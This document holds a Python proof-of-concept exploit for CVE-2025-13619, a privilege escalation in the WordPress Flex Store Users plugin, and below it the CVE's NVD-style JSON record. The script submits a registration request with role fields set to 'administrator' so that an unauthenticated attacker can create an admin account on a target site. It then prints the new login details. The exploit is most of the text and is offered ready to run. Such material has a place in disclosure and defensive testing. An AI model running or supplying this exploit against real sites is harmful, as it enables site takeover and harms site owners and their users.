CVE-2025-13619

import requests import sys # CVE-2025-13619 PoC - Flex Store Users Privilege Escalation # Target: WordPress site with Flex Store Users plugin <= 1.1.0 def exploit(target_url, username, password, email): """ Exploit privilege escalation in Flex Store Users plugin by specifying 'administrator' role during registration """ # Registration endpoint - typically /wp-login.php?action=register # or custom registration endpoint register_url = f"{target_url}/wp-login.php?action=register" # Payload with administrator role assignment # The vulnerable parameter varies based on plugin configuration payload = { 'user_login': username, 'user_email': email, 'user_password': password, 'user_password2': password, 'fs_type': 'administrator', # Vulnerable parameter 'role': 'administrator', # Alternative vulnerable parameter 'wp_capabilities[administrator]': '1' # WordPress role parameter } try: response = requests.post(register_url, data=payload, timeout=30) if response.status_code == 200: if 'success' in response.text.lower() or 'registered' in response.text.lower(): print(f"[+] Successfully registered admin user: {username}") print(f"[+] Email: {email}") print(f"[+] Password: {password}") print(f"[+] Login URL: {target_url}/wp-admin/") return True print("[-] Exploitation failed - target may not be vulnerable") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <email>") print(f"Example: python {sys.argv[0]} http://target.com eviladmin P@ssw0rd! [email protected]") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] email = sys.argv[4] exploit(target, user, pwd, email)

{"cve": {"id": "CVE-2025-13619", "sourceIdentifier": "[email protected]", "published": "2025-12-20T07:15:44.197", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Flex Store Users plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.1.0. This is due to the 'fsUserHandle::signup' and the 'fsSellerRole::add_role_seller' functions not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. Note: The vulnerability can be exploited with the 'fs_type' parameter if the Flex Store Seller plugin is also activated."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://themeforest.net/item/autosmart-automotive-car-dealer-wordpress-theme/20322930", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a2fc40ed-a6af-4069-be63-cb75e98cc98a?source=cve", "source": "[email protected]"}]}}